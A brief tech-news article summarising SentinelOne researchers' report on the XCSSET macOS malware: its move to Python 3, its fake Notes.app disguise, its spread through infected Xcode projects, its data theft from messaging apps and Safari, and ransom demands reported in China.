The operators of the XCSSET macOS malware have updated their source code components to Python 3, which is a considerable upgrade. Now, this malware can target macOS Monterey users as well.
According to a report by Phile Stokes and Dinesh Devadoss, who are SentinelOne researchers, the malware authors do not hide the primary executable in a fake Xcode.app like they did in the initial version in 2020, nor in the fake Mail.app like they did in 2021. Now, they use a fake Notes. app.
This malware was first detected in 2020 by Trend Micro. It was able to harvest sensitive information from WeChat, Skype, Telegram, and Apple Notes. It could also dump cookies from Safari web browsers and inject malicious JavaScript code into websites.
These infection chains make use of a dropper that comprises a user’s Xcode projects using a backdoor. The latter evades detection by appearing as system software or a Google Chrome web browser application.
The threat actor uses a custom AppleScript called listing. applescript to know how up-to-date the victim is with the MRT malware removal tool and Apple’s XProtect. By knowing, they are able to better target them with effective payloads, according to the researchers.
One of the unusual aspects of the attacks is that the malware deployed with Xcode projects is usually viewed as a method of propagation using GitHub repositories. Therefore, expanding its reach further.
Despite the malware existing for two years, researchers do not know much about the threat actors’ identity, targets, and motivations. As recently as May 2022, the attacks were reported in China, and the threat actors demanded the victims 200 USDT for them to unlock the stolen accounts.
The researchers noted that it is unclear whether the infected are actual victims or plants by threat actors in hopes of infecting unwary users.
Read Also
- In a $350 Million Deal, the Web-Hosting Firm Cloudways Has Been Bought by DigitalOcean
- Facebook’s Configuration Change Turns News Feeds Into Chaos
- WhatsApp Accounts on Counterfeit Phones Are Being Hacked Using Backdoors
- Renders of the Global Version of the MotoS30 Pro Leaked
- BugDrop Malware Is Being Developed by Cybercriminals To Bypass Android Security Features
- A Foldable Phone May Be in One Plus’ Future